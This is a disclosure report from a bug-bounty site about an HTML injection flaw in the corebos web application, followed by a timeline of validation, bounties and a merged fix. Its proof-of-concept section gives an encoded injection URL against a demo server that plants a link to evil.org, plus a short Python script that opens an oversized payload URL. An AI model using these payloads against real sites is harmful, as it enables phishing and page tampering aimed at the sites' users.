Code Injection in tsolucio/corebos

Valid

Reported on

Nov 6th 2021


Description

The user can control a point and infuse arbitrary HTML code into a vulnerable web page. This vulnerability can have numerous results, like disclosure of a user’s session treats that might be utilized to impersonate the victim, or, more generally, it can permit the aggressor to alter the page substance seen by the victims.

Proof of Concept

Go to::   http://demo.corebos.com/index.php?action=%3Ch%3EHTML-Injection%3C/h%3E%3Cp%3Ehello%3C/p%3E%3Cp%3Ehai%3C/p%3E%3Ch1%3ECONTENT%3C/h1%3E%3Ca%20href=https://evil.org%3EMalicious-Link%3C/a%3E&module=Home

// PoC.py (Content Injection Length)

import webbrowser

payload = "| 7h3h4ckv157 |" * 354
url = "http://demo.corebos.com/index.php?action=" + payload + "&module=Home"

webbrowser.open(url)


Impact

HTML Injection: Malicious URL + Content

An injection permits the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to recognize genuine parts from malicious parts of the page, and subsequently will parse and execute the entire page within the victim’s context. Attacker is able to control an input point and is able to inject subjective HTML code into a vulnerable web page.

We are processing your report and will contact the tsolucio/corebos team within 24 hours. a year ago
Joe Bordes validated this vulnerability a year ago
Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on ba92bb a year ago
Joe Bordes has been awarded the fix bounty
to join this conversation